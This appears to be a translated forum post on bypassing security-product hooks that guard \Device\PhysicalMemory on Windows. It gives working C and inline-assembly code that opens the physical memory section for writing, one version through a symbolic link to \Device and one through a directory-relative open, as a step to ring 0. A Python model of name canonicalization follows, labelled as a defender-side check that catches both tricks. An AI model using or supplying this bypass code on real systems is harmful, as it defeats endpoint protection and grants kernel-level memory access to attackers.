PhysicalMemory attacks, continued
I previously covered some ways of bypassing the protections on getting into ring 0 through PhysicalMemory:
http://bbs.pediy.com/showthread.php?t=89068&highlight=
One method mentioned there was creating a symbolic link to \Device\PhysicalMemory to get around the hook that intercepts ZwOpenSection opening that section. Many security products now defend against this, for example Comodo, Kaspersky and others, but all they do is intercept the creation of a symbolic link to \Device\PhysicalMemory. Is that enough?
Of course not. Look closely at the path \Device\PhysicalMemory: it is made up of the object directory \Device and the section name PhysicalMemory. So it is simple: create a link to the \Device object directory, say named 123, which nobody intercepts, and then open \123\PhysicalMemory. That gets around the interception, yields a handle to the physical memory object, and ring 0 follows easily. The implementation is as follows:
Code:
#include <windows.h>
#include <winternl.h>
// RTL_CONSTANT_STRING and InitializeObjectAttributes come from the NT headers
// (ntdef.h in the DDK), not from winternl.h. 32-bit MSVC: the native calls are
// made through inline asm using the stdcall convention of the x86 Zw* stubs.
HMODULE hlib = LoadLibrary("ntdll.dll");
PVOID pAddr = GetProcAddress(hlib, "ZwOpenSection");
PVOID pAddr2 = GetProcAddress(hlib, "ZwCreateSymbolicLinkObject");
HANDLE shandle;
PHANDLE psechandle = &shandle;
LONG stat;
HANDLE symhandle;
PHANDLE psymhandle = &symhandle;
OBJECT_ATTRIBUTES oba;
OBJECT_ATTRIBUTES oba2;
UNICODE_STRING smbname = RTL_CONSTANT_STRING(L"\\Device");                 // link target: the \Device object directory
UNICODE_STRING linkname = RTL_CONSTANT_STRING(L"\\??\\123");               // the link itself, nothing hooks this name
UNICODE_STRING phname = RTL_CONSTANT_STRING(L"\\??\\123\\PhysicalMemory"); // the section, named through the link
InitializeObjectAttributes(&oba2, &linkname, 0x40, 0, 0); // 0x40 = OBJ_CASE_INSENSITIVE
InitializeObjectAttributes(&oba, &phname, 0x40, 0, 0);
__asm {
    ; ZwCreateSymbolicLinkObject(&symhandle, SYMBOLIC_LINK_QUERY, &oba2, &smbname)
    lea eax, smbname
    push eax
    lea eax, oba2
    push eax
    push 1
    push psymhandle
    call pAddr2
    mov stat, eax          ; NTSTATUS of the link creation
    ; ZwOpenSection(&shandle, SECTION_MAP_WRITE, &oba)
    lea eax, oba
    push eax
    push 2
    push psechandle
    call pAddr
    mov stat, eax          ; NTSTATUS of the open; shandle is the section handle
}
Code:
#include <windows.h>
#include <winternl.h>
// Same variant without any symbolic link: open the \Device directory object
// itself and pass its handle as RootDirectory, so the name seen by a hook on
// ZwOpenSection is just "PhysicalMemory". Headers and asm as in the block above.
HMODULE hlib = LoadLibrary("ntdll.dll");
PVOID pAddr = GetProcAddress(hlib, "ZwOpenSection");
PVOID pAddr3 = GetProcAddress(hlib, "ZwOpenDirectoryObject");
HANDLE shandle;
PHANDLE psechandle = &shandle;
LONG stat;
OBJECT_ATTRIBUTES oba;
UNICODE_STRING smbname = RTL_CONSTANT_STRING(L"\\Device");
UNICODE_STRING phname = RTL_CONSTANT_STRING(L"PhysicalMemory"); // relative name
HANDLE dirhandle;
PHANDLE pdirhandle = &dirhandle;
OBJECT_ATTRIBUTES oba3;
InitializeObjectAttributes(&oba3, &smbname, 0x40, 0, 0); // 0x40 = OBJ_CASE_INSENSITIVE
__asm {
    ; ZwOpenDirectoryObject(&dirhandle, DIRECTORY_QUERY, &oba3)
    lea eax, oba3
    push eax
    push 1
    push pdirhandle
    call pAddr3
    mov stat, eax          ; NTSTATUS of the directory open
}
InitializeObjectAttributes(&oba, &phname, 0x40, dirhandle, 0); // RootDirectory = \Device
__asm {
    ; ZwOpenSection(&shandle, SECTION_MAP_WRITE, &oba)
    lea eax, oba
    push eax
    push 2
    push psechandle
    call pAddr
    mov stat, eax          ; NTSTATUS of the open
}
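A defender-side counterpart to both code blocks above, added here as a constructed example (it is neither the post's code nor Windows code): a dictionary models the object-manager namespace, a directory's canonical path stands in for the RootDirectory handle, and the check canonicalizes the ObjectName the way the object manager does before comparing it with \Device\PhysicalMemory, so a hook on ZwOpenSection catches the \??\123 link and the relative open alike. The function names (naive_check, resolved_check, canonical_name) are hypothetical.

```python
# Constructed model of object-manager name resolution (not Windows code):
# OBJECTS maps canonical paths to kinds, LINKS maps link paths to targets,
# and a directory's canonical path stands in for a RootDirectory handle.
PHYSMEM = "\\Device\\PhysicalMemory"
OBJECTS = {"\\": "dir", "\\Device": "dir", PHYSMEM: "section", "\\??": "dir"}
LINKS = {}

def create_symbolic_link(link_path, target):
    """Model of ZwCreateSymbolicLinkObject: register link_path -> target."""
    OBJECTS[link_path] = "link"
    LINKS[link_path] = target

def _child(directory, component):
    """Case-insensitive child lookup, as with OBJ_CASE_INSENSITIVE (0x40)."""
    want = (directory.rstrip("\\") + "\\" + component).lower()
    return next((p for p in OBJECTS if p.lower() == want), None)

def canonical_name(object_name, root_directory=None, max_reparse=16):
    """Resolve ObjectName relative to RootDirectory one component at a time;
    when a component is a symbolic link, restart from its target."""
    if root_directory is not None and OBJECTS.get(root_directory) != "dir":
        return None
    current = root_directory or "\\"
    pending = [c for c in object_name.split("\\") if c]
    reparses = 0
    while pending:
        found = _child(current, pending.pop(0))
        if found is None:
            return None
        if OBJECTS[found] == "link":
            reparses += 1
            if reparses > max_reparse:
                return None  # loop guard for self-referencing links
            pending = [c for c in LINKS[found].split("\\") if c] + pending
            current = "\\"
        else:
            current = found
    return current

def naive_check(object_name, root_directory=None):
    """The check the post says vendors do: compare the raw name only."""
    return object_name.lower() == PHYSMEM.lower()

def resolved_check(object_name, root_directory=None):
    """Canonicalize first, then compare; catches both tricks in the post."""
    target = canonical_name(object_name, root_directory)
    return target is not None and target.lower() == PHYSMEM.lower()
```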